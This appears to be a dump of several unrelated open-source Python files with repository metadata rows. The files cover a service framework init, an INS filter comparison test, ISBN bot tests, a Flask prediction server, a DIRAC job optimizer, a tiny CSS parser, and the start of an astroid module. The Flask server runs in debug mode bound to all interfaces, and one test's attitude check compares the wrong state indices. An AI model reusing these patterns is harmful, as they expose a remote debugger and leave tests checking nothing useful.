'publish', 'xsubscribe', 'get', 'post', 'head', 'put', 'patch', 'delete', 'options', 'trace',
'Registry', 'RequestException', 'Response', 'Request', 'log', 'setup_logging',
'deprecated', 'VykedServiceException', 'VykedServiceError', '__version__', 'enqueue', 'task_queue']
from .host import Host # noqa
from .services import (TCPService, HTTPService, HTTPServiceClient, TCPServiceClient) # noqa
from .decorators.http import (get, post, head, put, patch, delete, options, trace) # noqa
from .decorators.tcp import (api, request, subscribe, publish, xsubscribe, deprecated, enqueue, task_queue) # noqa
from .registry import Registry # noqa
from .utils import log # noqa
from .exceptions import RequestException, VykedServiceError, VykedServiceException # noqa
from .utils.log import setup_logging # noqa
from .wrappers import Response, Request # noqa
__version__ = '2.4.3'
| mit | 6,902,178,428,097,031,000 | 63.6875 | 119 | 0.697585 | false |
jpbarraca/dRonin | python/ins/compare.py | 11 | 5497 | from cins import CINS
from pyins import PyINS
import unittest
from sympy import symbols, lambdify, sqrt
from sympy import MatrixSymbol, Matrix
from numpy import cos, sin, power
from sympy.matrices import *
from quaternions import *
import numpy
import math
import ins
VISUALIZE = False
class CompareFunctions(unittest.TestCase):
def setUp(self):
self.c_sim = CINS()
self.py_sim = PyINS()
self.c_sim.prepare()
self.py_sim.prepare()
def run_static(self, accel=[0.0,0.0,-PyINS.GRAV],
gyro=[0.0,0.0,0.0], mag=[400,0,1600],
pos=[0,0,0], vel=[0,0,0],
noise=False, STEPS=200000):
""" simulate a static set of inputs and measurements
"""
c_sim = self.c_sim
py_sim = self.py_sim
dT = 1.0 / 666.0
numpy.random.seed(1)
c_history = numpy.zeros((STEPS,16))
c_history_rpy = numpy.zeros((STEPS,3))
py_history = numpy.zeros((STEPS,16))
py_history_rpy = numpy.zeros((STEPS,3))
times = numpy.zeros((STEPS,1))
for k in range(STEPS):
print `k`
ng = numpy.zeros(3,)
na = numpy.zeros(3,)
np = numpy.zeros(3,)
nv = numpy.zeros(3,)
nm = numpy.zeros(3,)
if noise:
ng = numpy.random.randn(3,) * 1e-3
na = numpy.random.randn(3,) * 1e-3
np = numpy.random.randn(3,) * 1e-3
nv = numpy.random.randn(3,) * 1e-3
nm = numpy.random.randn(3,) * 10.0
c_sim.predict(gyro+ng, accel+na, dT=dT)
py_sim.predict(gyro+ng, accel+na, dT=dT)
times[k] = k * dT
c_history[k,:] = c_sim.state
c_history_rpy[k,:] = quat_rpy(c_sim.state[6:10])
py_history[k,:] = py_sim.state
py_history_rpy[k,:] = quat_rpy(py_sim.state[6:10])
if False and k % 60 == 59:
c_sim.correction(pos=pos+np)
py_sim.correction(pos=pos+np)
if False and k % 60 == 59:
c_sim.correction(vel=vel+nv)
py_sim.correction(vel=vel+nv)
if True and k % 20 == 8:
c_sim.correction(baro=-pos[2]+np[2])
py_sim.correction(baro=-pos[2]+np[2])
if True and k % 20 == 15:
c_sim.correction(mag=mag+nm)
py_sim.correction(mag=mag+nm)
self.assertState(c_sim.state, py_sim.state)
if VISUALIZE:
from numpy import cos, sin
import matplotlib.pyplot as plt
fig, ax = plt.subplots(2,2)
k = STEPS
ax[0][0].cla()
ax[0][0].plot(times[0:k:4],c_history[0:k:4,0:3])
ax[0][0].set_title('Position')
plt.sca(ax[0][0])
plt.ylabel('m')
ax[0][1].cla()
ax[0][1].plot(times[0:k:4],c_history[0:k:4,3:6])
ax[0][1].set_title('Velocity')
plt.sca(ax[0][1])
plt.ylabel('m/s')
#plt.ylim(-2,2)
ax[1][0].cla()
ax[1][0].plot(times[0:k:4],c_history_rpy[0:k:4,:])
ax[1][0].set_title('Attitude')
plt.sca(ax[1][0])
plt.ylabel('Angle (Deg)')
plt.xlabel('Time (s)')
#plt.ylim(-1.1,1.1)
ax[1][1].cla()
ax[1][1].plot(times[0:k:4],c_history[0:k:4,10:])
ax[1][1].set_title('Biases')
plt.sca(ax[1][1])
plt.ylabel('Bias (rad/s)')
plt.xlabel('Time (s)')
plt.suptitle(unittest.TestCase.shortDescription(self))
plt.show()
        return c_sim.state, c_history, times
def assertState(self, c_state, py_state):
""" check that the state is near a desired position
"""
# check position
self.assertAlmostEqual(c_state[0],py_state[0],places=1)
self.assertAlmostEqual(c_state[1],py_state[1],places=1)
self.assertAlmostEqual(c_state[2],py_state[2],places=1)
# check velocity
self.assertAlmostEqual(c_state[3],py_state[3],places=1)
self.assertAlmostEqual(c_state[4],py_state[4],places=1)
self.assertAlmostEqual(c_state[5],py_state[5],places=1)
# check attitude
self.assertAlmostEqual(c_state[0],py_state[0],places=0)
self.assertAlmostEqual(c_state[1],py_state[1],places=0)
self.assertAlmostEqual(c_state[2],py_state[2],places=0)
self.assertAlmostEqual(c_state[3],py_state[3],places=0)
# check bias terms (gyros and accels)
self.assertAlmostEqual(c_state[10],py_state[10],places=2)
self.assertAlmostEqual(c_state[11],py_state[11],places=2)
self.assertAlmostEqual(c_state[12],py_state[12],places=2)
self.assertAlmostEqual(c_state[13],py_state[13],places=2)
self.assertAlmostEqual(c_state[14],py_state[14],places=2)
self.assertAlmostEqual(c_state[15],py_state[15],places=2)
def test_face_west(self):
""" test convergence to face west
"""
mag = [0,-400,1600]
        # run_static compares the C and Python state at every step
        self.run_static(mag=mag, STEPS=50000)
if __name__ == '__main__':
selected_test = None
if selected_test is not None:
VISUALIZE = True
suite = unittest.TestSuite()
suite.addTest(CompareFunctions(selected_test))
unittest.TextTestRunner().run(suite)
else:
unittest.main() | gpl-3.0 | 5,129,304,335,787,355,000 | 30.780347 | 69 | 0.538112 | false |
TridevGuha/pywikibot-core | tests/isbn_tests.py | 2 | 8730 | # -*- coding: utf-8 -*-
"""Tests for isbn script."""
#
# (C) Pywikibot team, 2014-2015
#
# Distributed under the terms of the MIT license.
#
from __future__ import unicode_literals
import pywikibot
__version__ = '$Id$'
from pywikibot import Bot, Claim, ItemPage
from pywikibot.cosmetic_changes import CosmeticChangesToolkit, CANCEL_MATCH
from scripts.isbn import (
ISBN10, ISBN13, InvalidIsbnException as IsbnExc,
getIsbn, hyphenateIsbnNumbers, convertIsbn10toIsbn13,
main
)
from tests.aspects import (
unittest, TestCase, DefaultDrySiteTestCase,
WikibaseTestCase, ScriptMainTestCase,
)
class TestCosmeticChangesISBN(DefaultDrySiteTestCase):
"""Test CosmeticChanges ISBN fix."""
def test_valid_isbn(self):
"""Test ISBN."""
cc = CosmeticChangesToolkit(self.site, namespace=0)
text = cc.fix_ISBN(' ISBN 097522980x ')
self.assertEqual(text, ' ISBN 0-9752298-0-X ')
text = cc.fix_ISBN(' ISBN 9780975229804 ')
self.assertEqual(text, ' ISBN 978-0-9752298-0-4 ')
def test_invalid_isbn(self):
"""Test that it'll fail when the ISBN is invalid."""
cc = CosmeticChangesToolkit(self.site, namespace=0)
self.assertRaises(Exception, cc.fix_ISBN, 'ISBN 0975229LOL') # Invalid characters
self.assertRaises(Exception, cc.fix_ISBN, 'ISBN 0975229801') # Invalid checksum
self.assertRaises(Exception, cc.fix_ISBN, 'ISBN 09752298') # Invalid length
self.assertRaises(Exception, cc.fix_ISBN, 'ISBN 09752X9801') # X in the middle
def test_ignore_invalid_isbn(self):
"""Test fixing ISBN numbers with an invalid ISBN."""
cc = CosmeticChangesToolkit(self.site, namespace=0, ignore=CANCEL_MATCH)
text = cc.fix_ISBN(' ISBN 0975229LOL ISBN 9780975229804 ')
self.assertEqual(text, ' ISBN 0975229LOL ISBN 978-0-9752298-0-4 ')
class TestIsbn(TestCase):
"""Test ISBN-related classes and helper functions."""
net = False
def test_isbn10(self):
"""Test ISBN10."""
# Test general features
isbn = ISBN10('097522980x')
isbn.format()
self.assertEqual(isbn.code, '0-9752298-0-X')
self.assertEqual(isbn.digits(),
['0', '9', '7', '5', '2', '2', '9', '8', '0', 'X'])
# Converting to ISBN13
isbn13 = isbn.toISBN13()
self.assertEqual(isbn13.code, '978-0-9752298-0-4')
# Errors
self.assertRaises(IsbnExc, ISBN10, '0975229LOL') # Invalid characters
self.assertRaises(IsbnExc, ISBN10, '0975229801') # Invalid checksum
self.assertRaises(IsbnExc, ISBN10, '09752298') # Invalid length
self.assertRaises(IsbnExc, ISBN10, '09752X9801') # X in the middle
def test_isbn13(self):
"""Test ISBN13."""
# Test general features
isbn = ISBN13('9783161484100')
isbn.format()
self.assertEqual(isbn.code, '978-3-16-148410-0')
self.assertEqual(isbn.digits(),
[9, 7, 8, 3, 1, 6, 1, 4, 8, 4, 1, 0, 0])
isbn = ISBN13('978809027341', checksumMissing=True)
self.assertEqual(isbn.code, '9788090273412')
# Errors
self.assertRaises(IsbnExc, ISBN13, '9783161484LOL') # Invalid chars
self.assertRaises(IsbnExc, ISBN13, '9783161484105') # Invalid checksum
self.assertRaises(IsbnExc, ISBN13, '9783161484') # Invalid length
def test_general(self):
"""Test things that apply both to ISBN10 and ISBN13."""
# getIsbn
self.assertIsInstance(getIsbn('097522980x'), ISBN10)
self.assertIsInstance(getIsbn('9783161484100'), ISBN13)
self.assertRaisesRegex(IsbnExc,
'ISBN-13: The ISBN 097522 is not 13 digits '
'long. / ISBN-10: The ISBN 097522 is not 10 '
'digits long.', getIsbn, '097522')
# hyphenateIsbnNumbers
self.assertEqual(hyphenateIsbnNumbers('ISBN 097522980x'),
'ISBN 0-9752298-0-X')
self.assertEqual(hyphenateIsbnNumbers('ISBN 0975229801'),
'ISBN 0975229801') # Invalid ISBN - no changes
# convertIsbn10toIsbn13
self.assertEqual(convertIsbn10toIsbn13('ISBN 0-9752298-0-X'),
'ISBN 978-0-9752298-0-4')
self.assertEqual(convertIsbn10toIsbn13('ISBN 0-9752298-0-1'),
'ISBN 0-9752298-0-1') # Invalid ISBN - no changes
# Errors
isbn = ISBN10('9492098059')
self.assertRaisesRegex(IsbnExc,
'ISBN 9492098059: group number unknown.',
isbn.format)
isbn = ISBN10('9095012042')
self.assertRaisesRegex(IsbnExc,
'ISBN 9095012042: publisher number unknown.',
isbn.format)
class TestIsbnBot(ScriptMainTestCase):
"""Test isbnbot with non-write patching (if the testpage exists)."""
family = 'test'
code = 'test'
user = True
write = True
def setUp(self):
"""Patch the Bot class to avoid an actual write."""
self._original_userPut = Bot.userPut
Bot.userPut = userPut_dummy
super(TestIsbnBot, self).setUp()
def tearDown(self):
"""Unpatch the Bot class."""
Bot.userPut = self._original_userPut
super(TestIsbnBot, self).tearDown()
def test_isbn(self):
"""Test the ISBN bot."""
site = self.get_site()
p1 = pywikibot.Page(site, 'User:M4tx/IsbnTest')
# Create the page if it does not exist
if not p1.exists() or p1.text != 'ISBN 097522980x':
p1.text = 'ISBN 097522980x'
p1.save('unit test', botflag=True)
main('-page:User:M4tx/IsbnTest', '-always', '-format', '-to13')
self.assertEqual(self.newtext, 'ISBN 978-0-9752298-0-4')
def userPut_dummy(self, page, oldtext, newtext, **kwargs):
"""Avoid that userPut writes."""
TestIsbnBot.newtext = newtext
class TestIsbnWikibaseBot(ScriptMainTestCase, WikibaseTestCase):
"""Test isbnbot on Wikibase site with non-write patching."""
family = 'wikidata'
code = 'test'
@classmethod
def setUpClass(cls):
super(TestIsbnWikibaseBot, cls).setUpClass()
# Check if the unit test item page and the property both exist
item_ns = cls.get_repo().item_namespace
for page in cls.get_site().search('IsbnWikibaseBotUnitTest', step=1,
total=1, namespaces=item_ns):
cls.test_page_qid = page.title()
item_page = ItemPage(cls.get_repo(), page.title())
for pid, claims in item_page.get()['claims'].items():
for claim in claims:
prop_page = pywikibot.PropertyPage(cls.get_repo(),
claim.getID())
prop_page.get()
if ('ISBN-10' in prop_page.labels.values() and
claim.getTarget() == '097522980x'):
return
raise unittest.SkipTest(
u'%s: "ISBN-10" property was not found in '
u'"IsbnWikibaseBotUnitTest" item page' % cls.__name__)
raise unittest.SkipTest(
u'%s: "IsbnWikibaseBotUnitTest" item page was not found'
% cls.__name__)
def setUp(self):
"""Patch Claim.setTarget and ItemPage.editEntity which write."""
TestIsbnWikibaseBot._original_setTarget = Claim.setTarget
Claim.setTarget = setTarget_dummy
TestIsbnWikibaseBot._original_editEntity = ItemPage.editEntity
ItemPage.editEntity = editEntity_dummy
super(TestIsbnWikibaseBot, self).setUp()
def tearDown(self):
"""Unpatch the dummy methods."""
Claim.setTarget = TestIsbnWikibaseBot._original_setTarget
ItemPage.editEntity = TestIsbnWikibaseBot._original_editEntity
super(TestIsbnWikibaseBot, self).tearDown()
def test_isbn(self):
"""Test using the bot and wikibase."""
main('-page:' + self.test_page_qid, '-always', '-format')
self.assertEqual(self.setTarget_value, '0-9752298-0-X')
main('-page:' + self.test_page_qid, '-always', '-to13')
self.assertTrue(self.setTarget_value, '978-0975229804')
def setTarget_dummy(self, value):
"""Avoid that setTarget writes."""
TestIsbnWikibaseBot.setTarget_value = value
TestIsbnWikibaseBot._original_setTarget(self, value)
def editEntity_dummy(self, data=None, **kwargs):
"""Avoid that editEntity writes."""
pass
if __name__ == "__main__":
unittest.main()
| mit | 1,830,913,979,204,939,000 | 35.991525 | 90 | 0.604353 | false |
tmylk/seldon-server | external/predictor/python/docker/vw_runtime/scripts/server.py | 2 | 1223 | import importlib
from flask import Flask, jsonify
from flask import request
app = Flask(__name__)
import json
import pprint
app.config.from_object('server_config')
_recs_mod = importlib.import_module(app.config['PREDICTION_ALG'])
def extract_input():
client = request.args.get('client')
j = json.loads(request.args.get('json'))
input = {
"client" : client,
"json" : j
}
return input
def format_predictions(predictions,model):
formatted_recs_list=[]
for (score,classId,confidence) in predictions:
formatted_recs_list.append({
"prediction": score,
"predictedClass": str(classId),
"confidence" : confidence
})
return { "predictions": formatted_recs_list, "model" : model }
@app.route('/predict', methods=['GET'])
def predict():
print "predict called"
input = extract_input()
print input
(recs,model) = _recs_mod.get_predictions(
input['client'],
input['json'])
print "recs returned ",recs
f=format_predictions(recs,model)
json = jsonify(f)
return json
_recs_mod.init(app.config)
app.debug = True
if __name__ == "__main__":
app.run(host="0.0.0.0", debug=True)
| apache-2.0 | -8,166,791,802,808,382,000 | 24.479167 | 66 | 0.623876 | false |
miloszz/DIRAC | WorkloadManagementSystem/Agent/ThreadedMightyOptimizer.py | 7 | 10737 | ########################################################################
# $HeadURL$
# File : ThreadedMightyOptimizer.py
# Author : Adria Casajus
########################################################################
"""
SuperOptimizer
One optimizer to rule them all, one optimizer to find them,
one optimizer to bring them all, and in the darkness bind them.
"""
__RCSID__ = "$Id$"
import time
import os
import threading
import Queue
from DIRAC import gLogger, gConfig, S_OK, S_ERROR
from DIRAC.Core.Base.AgentModule import AgentModule
from DIRAC.WorkloadManagementSystem.DB.JobDB import JobDB
from DIRAC.WorkloadManagementSystem.DB.JobLoggingDB import JobLoggingDB
from DIRAC.Core.Utilities import ThreadSafe, List
from DIRAC.Core.Utilities.Shifter import setupShifterProxyInEnv
gOptimizerLoadSync = ThreadSafe.Synchronizer()
class ThreadedMightyOptimizer( AgentModule ):
"""
The specific agents must provide the following methods:
- initialize() for initial settings
- beginExecution()
- execute() - the main method called in the agent cycle
- endExecution()
    - finalize() - graceful exit of the agent, usually used before an agent restart
"""
__jobStates = [ 'Received', 'Checking' ]
__defaultValidOptimizers = [ 'WorkloadManagement/JobPath',
'WorkloadManagement/JobSanity',
'WorkloadManagement/JobScheduling',
'WorkloadManagement/TaskQueue',
]
def initialize( self ):
""" Standard constructor
"""
self.jobDB = JobDB()
self.jobLoggingDB = JobLoggingDB()
self._optimizingJobs = JobsInTheWorks()
self._optimizers = {}
self._threadedOptimizers = {}
self.am_setOption( "PollingTime", 30 )
return S_OK()
def execute( self ):
""" Standard Agent module execute method
"""
#Get jobs from DB
result = self.jobDB.selectJobs( { 'Status': self.__jobStates } )
if not result[ 'OK' ]:
gLogger.error( "Cannot retrieve jobs in states %s" % self.__jobStates )
return result
jobsList = result[ 'Value' ]
for i in range( len( jobsList ) ):
jobsList[i] = int( jobsList[i] )
jobsList.sort()
self.log.info( "Got %s jobs for this iteration" % len( jobsList ) )
if not jobsList: return S_OK()
#Check jobs that are already being optimized
newJobsList = self._optimizingJobs.addJobs( jobsList )
if not newJobsList:
return S_OK()
#Get attrs of jobs to be optimized
result = self.jobDB.getAttributesForJobList( newJobsList )
if not result[ 'OK' ]:
gLogger.error( "Cannot retrieve attributes for %s jobs %s" % len( newJobsList ) )
return result
jobsToProcess = result[ 'Value' ]
for jobId in jobsToProcess:
self.log.info( "== Processing job %s == " % jobId )
jobAttrs = jobsToProcess[ jobId ]
result = self.__dispatchJob( jobId, jobAttrs, False )
if not result[ 'OK' ]:
gLogger.error( "There was a problem optimizing job", "JID %s: %s" % ( jobId, result[ 'Message' ] ) )
return S_OK()
def __dispatchJob( self, jobId, jobAttrs, jobDef, keepOptimizing = True ):
""" Decide what to do with the Job
"""
returnValue = S_OK()
if keepOptimizing:
result = self.__sendJobToOptimizer( jobId, jobAttrs, jobDef )
if result[ 'OK' ] and result[ 'Value' ]:
return S_OK()
if not result[ 'OK' ]:
returnValue = result
        gLogger.error( "Could not send job to optimizer\n",
                       "\tJob: %s\n\tMessage: %s" % ( jobId,
result[ 'Message' ] ) )
self._optimizingJobs.deleteJob( jobId )
return returnValue
def __sendJobToOptimizer( self, jobId, jobAttrs, jobDef ):
""" Send Job to Optimizer queue
"""
optimizerName = self.__getNextOptimizerName( jobAttrs )
if not optimizerName:
return S_OK( False )
if optimizerName not in self.am_getOption( "ValidOptimizers", self.__defaultValidOptimizers ):
return S_OK( False )
if optimizerName not in self._threadedOptimizers:
to = ThreadedOptimizer( optimizerName, self.am_getModuleParam( 'fullName' ),
self.__dispatchJob )
result = to.initialize( self.jobDB, self.jobLoggingDB )
if not result[ 'OK' ]:
return S_OK( False )
self._threadedOptimizers[ optimizerName ] = to
self._threadedOptimizers[ optimizerName ].optimizeJob( jobId, jobAttrs, jobDef )
return S_OK( True )
def __getNextOptimizerName( self, jobAttrs ):
""" Determine next Optimizer
"""
if jobAttrs[ 'Status' ] == 'Received':
optList = [ "JobPath" ]
elif jobAttrs[ 'Status' ] == 'Checking':
optList = List.fromChar( jobAttrs[ 'MinorStatus' ], "/" )
else:
return False
if len( optList ) == 1:
optList.insert( 0, "WorkloadManagement" )
if len( optList ) > 2:
optList[1] = "/".join( optList[1:] )
return "/".join( optList )
gOptimizingJobs = ThreadSafe.Synchronizer()
class JobsInTheWorks:
def __init__( self, maxTime = 0 ):
self.__jobs = {}
self.__maxTime = maxTime
self.log = gLogger.getSubLogger( "JobsBeingOptimized" )
@gOptimizingJobs
def addJobs( self, jobsList ):
now = time.time()
self.__purgeExpiredJobs()
addedJobs = []
for job in jobsList:
if job not in self.__jobs:
self.__jobs[ job ] = now
addedJobs.append( job )
self.log.info( "Added %s jobs to the list" % addedJobs )
return addedJobs
def __purgeExpiredJobs( self ):
if not self.__maxTime:
return
stillOnIt = {}
now = time.time()
for job in self.__jobs:
if now - self.__jobs[ job ] < self.__maxTime:
stillOnIt[ job ] = self.__jobs[ job ]
self.__jobs = stillOnIt
@gOptimizingJobs
def deleteJob( self, job ):
try:
if job in self.__jobs:
self.log.info( "Deleted job %s from the list" % job )
del( self.__jobs[ job ] )
except Exception, e:
print "=" * 20
print "EXCEPTION", e
print "THIS SHOULDN'T HAPPEN"
print "=" * 20
class ThreadedOptimizer( threading.Thread ):
def __init__( self, optimizerName, containerName, dispatchFunction ):
threading.Thread.__init__( self )
self.setDaemon( True )
self.optimizerName = optimizerName
self.containerName = containerName
self.dispatchFunction = dispatchFunction
self.jobQueue = Queue.Queue()
def initialize( self, jobDB, jobLoggingDB ):
self.jobDB = jobDB
self.jobLoggingDB = jobLoggingDB
gLogger.info( "Loading optimizer %s" % self.optimizerName )
result = self.__loadOptimizer()
if not result[ 'OK' ]:
return result
self.optimizer = result[ 'Value' ]
self.start()
return S_OK()
@gOptimizerLoadSync
def __loadOptimizer( self ):
#Need to load an optimizer
gLogger.info( "Loading optimizer %s" % self.optimizerName )
optList = List.fromChar( self.optimizerName, "/" )
optList[1] = "/".join( optList[1:] )
systemName = optList[0]
agentName = "%sAgent" % optList[1]
rootModulesToLook = gConfig.getValue( "/LocalSite/Extensions", [] ) + [ 'DIRAC' ]
for rootModule in rootModulesToLook:
try:
gLogger.info( "Trying to load from root module %s" % rootModule )
opPyPath = '%s.%sSystem.Agent.%s' % ( rootModule, systemName, agentName )
optimizerModule = __import__( opPyPath,
globals(),
locals(), agentName )
except ImportError, e:
gLogger.info( "Can't load %s: %s" % ( opPyPath, str( e ) ) )
continue
try:
optimizerClass = getattr( optimizerModule, agentName )
optimizer = optimizerClass( '%sAgent' % self.optimizerName, self.containerName )
result = optimizer.am_initialize( self.jobDB, self.jobLoggingDB )
if not result[ 'OK' ]:
return S_ERROR( "Can't initialize optimizer %s: %s" % ( self.optimizerName, result[ 'Message' ] ) )
return S_OK( optimizer )
except Exception, e:
gLogger.exception( "Can't load optimizer %s with root module %s" % ( self.optimizerName, rootModule ) )
return S_ERROR( "Can't load optimizer %s" % self.optimizerName )
def optimizeJob( self, jobId, jobAttrs, jobDef ):
self.jobQueue.put( ( jobId, jobAttrs, jobDef ), block = True )
def run( self ):
while True:
jobId, jobAttrs, jobDef = self.jobQueue.get( block = True )
#If there's no job def then get it
if not jobDef:
result = self.optimizer.getJobDefinition( jobId, jobDef )
if not result['OK']:
self.optimizer.setFailedJob( jobId, result[ 'Message' ] )
return result
jobDef = result[ 'Value' ]
#Does the optimizer require a proxy?
shifterEnv = False
if self.optimizer.am_getModuleParam( 'shifterProxy' ):
shifterEnv = True
result = setupShifterProxyInEnv( self.optimizer.am_getModuleParam( 'shifterProxy' ),
self.optimizer.am_getShifterProxyLocation() )
if not result[ 'OK' ]:
return result
#Call the initCycle function
result = self.optimizer.am_secureCall( self.optimizer.beginExecution, name = "beginExecution" )
if not result[ 'OK' ]:
return result
#Do the work
result = self.optimizer.optimizeJob( jobId, jobDef[ 'classad' ] )
#If there was a shifter proxy, unset it
if shifterEnv:
del( os.environ[ 'X509_USER_PROXY' ] )
if not result[ 'OK' ]:
gLogger.error( "Job failed optimization step\n",
"\tJob: %s\n\tOptimizer: %s\n\tMessage: %s" % ( jobId,
self.optimizerName,
result[ 'Message' ] ) )
self.dispatchFunction( jobId, jobAttrs, jobDef, False )
else:
#Job optimization was OK
nextOptimizer = result[ 'Value' ]
#Check if the JDL has changed
newJDL = jobDef[ 'classad' ].asJDL()
if newJDL != jobDef[ 'jdl' ]:
jobDef[ 'jdl' ] = newJDL
#If there's a new optimizer set it!
if nextOptimizer:
jobAttrs[ 'Status' ] = 'Checking'
jobAttrs[ 'MinorStatus' ] = nextOptimizer
gLogger.info( "Sending job %s to next optimizer: %s" % ( jobId, nextOptimizer ) )
else:
gLogger.info( "Finished optimizing job %s" % jobId )
self.dispatchFunction( jobId, jobAttrs, jobDef, nextOptimizer )
| gpl-3.0 | 209,051,821,181,226,140 | 36.673684 | 111 | 0.600447 | false |
EtienneOz/WebfontGenerator | scour/yocto_css.py | 8 | 2872 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# yocto-css, an extremely bare minimum CSS parser
#
# Copyright 2009 Jeff Schiller
#
# This file is part of Scour, http://www.codedread.com/scour/
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# In order to resolve Bug 368716 (https://bugs.launchpad.net/scour/+bug/368716)
# scour needed a bare-minimum CSS parser in order to determine if some elements
# were still referenced by CSS properties.
# I looked at css-py (a CSS parser built in Python), but that library
# is about 35k of Python and requires ply to be installed. I just need
# something very basic to suit scour's needs.
# yocto-css takes a string of CSS and tries to spit out a list of rules
# A rule is an associative array (dictionary) with the following keys:
# - selector: contains the string of the selector (see CSS grammar)
# - properties: contains an associative array of CSS properties for this rule
# TODO: need to build up some unit tests for yocto_css
# stylesheet : [ CDO | CDC | S | statement ]*;
# statement : ruleset | at-rule;
# at-rule : ATKEYWORD S* any* [ block | ';' S* ];
# block : '{' S* [ any | block | ATKEYWORD S* | ';' S* ]* '}' S*;
# ruleset : selector? '{' S* declaration? [ ';' S* declaration? ]* '}' S*;
# selector : any+;
# declaration : property S* ':' S* value;
# property : IDENT;
# value : [ any | block | ATKEYWORD S* ]+;
# any : [ IDENT | NUMBER | PERCENTAGE | DIMENSION | STRING
# | DELIM | URI | HASH | UNICODE-RANGE | INCLUDES
# | DASHMATCH | FUNCTION S* any* ')'
# | '(' S* any* ')' | '[' S* any* ']' ] S*;
def parseCssString(str):
rules = []
# first, split on } to get the rule chunks
chunks = str.split('}')
for chunk in chunks:
# second, split on { to get the selector and the list of properties
bits = chunk.split('{')
if len(bits) != 2: continue
rule = {}
rule['selector'] = bits[0].strip()
# third, split on ; to get the property declarations
bites = bits[1].strip().split(';')
if len(bites) < 1: continue
props = {}
for bite in bites:
# fourth, split on : to get the property name and value
nibbles = bite.strip().split(':')
if len(nibbles) != 2: continue
props[nibbles[0].strip()] = nibbles[1].strip()
rule['properties'] = props
rules.append(rule)
return rules
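# Illustrative usage of parseCssString (an added example, not part of the
# original scour module): a one-rule stylesheet parses into a single
# selector/properties dictionary.
if __name__ == '__main__':
    # Expected result (dictionary key order may vary):
    # [{'selector': 'circle', 'properties': {'fill': 'red', 'stroke-width': '2'}}]
    print(parseCssString("circle { fill: red; stroke-width: 2 }"))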
| gpl-2.0 | 5,877,176,446,397,554,000 | 38.888889 | 79 | 0.652855 | false |
krader1961/python-mode | pymode/libs/astroid/scoped_nodes.py | 8 | 52820 | # copyright 2003-2013 LOGILAB S.A. (Paris, FRANCE), all rights reserved.
# contact http://www.logilab.fr/ -- mailto:[email protected]
#
# This file is part of astroid.
#
# astroid is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation, either version 2.1 of the License, or (at your
# option) any later version.
#
# astroid is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License
# for more details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with astroid. If not, see <http://www.gnu.org/licenses/>.
"""This module contains the classes for "scoped" nodes, i.e. nodes which open a
new local scope in the language definition: Module, Class, Function (and
Lambda, GenExpr, DictComp and SetComp to some extent).
"""
from __future__ import with_statement
__doctype__ = "restructuredtext en"
import sys
import warnings
from itertools import chain
try:
from io import BytesIO
except ImportError:
from cStringIO import StringIO as BytesIO
import six
from logilab.common.compat import builtins
from logilab.common.decorators import cached, cachedproperty
from astroid.exceptions import NotFoundError, \
AstroidBuildingException, InferenceError, ResolveError
from astroid.node_classes import Const, DelName, DelAttr, \
Dict, From, List, Pass, Raise, Return, Tuple, Yield, YieldFrom, \
LookupMixIn, const_factory as cf, unpack_infer, CallFunc
from astroid.bases import NodeNG, InferenceContext, Instance, copy_context, \
YES, Generator, UnboundMethod, BoundMethod, _infer_stmts, \
BUILTINS
from astroid.mixins import FilterStmtsMixin
from astroid.bases import Statement
from astroid.manager import AstroidManager
ITER_METHODS = ('__iter__', '__getitem__')
PY3K = sys.version_info >= (3, 0)
def _c3_merge(sequences):
"""Merges MROs in *sequences* to a single MRO using the C3 algorithm.
Adapted from http://www.python.org/download/releases/2.3/mro/.
"""
result = []
while True:
sequences = [s for s in sequences if s] # purge empty sequences
if not sequences:
return result
for s1 in sequences: # find merge candidates among seq heads
candidate = s1[0]
for s2 in sequences:
if candidate in s2[1:]:
candidate = None
break # reject the current head, it appears later
else:
break
if not candidate:
# Show all the remaining bases, which were considered as
# candidates for the next mro sequence.
bases = ["({})".format(", ".join(base.name
for base in subsequence))
for subsequence in sequences]
raise ResolveError("Cannot create a consistent method resolution "
"order for bases %s" % ", ".join(bases))
result.append(candidate)
# remove the chosen candidate
for seq in sequences:
if seq[0] == candidate:
del seq[0]
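# Illustrative sketch (comment only, not part of the original astroid code):
# _c3_merge also works on plain sequences, which makes it easy to check by
# hand. For a diamond C(A, B) with A(O) and B(O), merging the head, the
# parents' MROs and the list of parents gives the usual C3 linearization:
#     _c3_merge([['C'], ['A', 'O'], ['B', 'O'], ['A', 'B']])
#     == ['C', 'A', 'B', 'O']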
def _verify_duplicates_mro(sequences):
for sequence in sequences:
names = [node.qname() for node in sequence]
if len(names) != len(set(names)):
raise ResolveError('Duplicates found in the mro.')
def remove_nodes(func, cls):
def wrapper(*args, **kwargs):
nodes = [n for n in func(*args, **kwargs) if not isinstance(n, cls)]
if not nodes:
raise NotFoundError()
return nodes
return wrapper
def function_to_method(n, klass):
if isinstance(n, Function):
if n.type == 'classmethod':
return BoundMethod(n, klass)
if n.type != 'staticmethod':
return UnboundMethod(n)
return n
def std_special_attributes(self, name, add_locals=True):
if add_locals:
locals = self.locals
else:
locals = {}
if name == '__name__':
return [cf(self.name)] + locals.get(name, [])
if name == '__doc__':
return [cf(self.doc)] + locals.get(name, [])
if name == '__dict__':
return [Dict()] + locals.get(name, [])
raise NotFoundError(name)
MANAGER = AstroidManager()
def builtin_lookup(name):
"""lookup a name into the builtin module
return the list of matching statements and the astroid for the builtin
module
"""
builtin_astroid = MANAGER.ast_from_module(builtins)
if name == '__dict__':
return builtin_astroid, ()
try:
stmts = builtin_astroid.locals[name]
except KeyError:
stmts = ()
return builtin_astroid, stmts
# TODO move this Mixin to mixins.py; problem: 'Function' in _scope_lookup
class LocalsDictNodeNG(LookupMixIn, NodeNG):
""" this class provides locals handling common to Module, Function
    and Class nodes, including a dict-like interface for direct access
to locals information
"""
# attributes below are set by the builder module or by raw factories
# dictionary of locals with name as key and node defining the local as
# value
def qname(self):
"""return the 'qualified' name of the node, eg module.name,
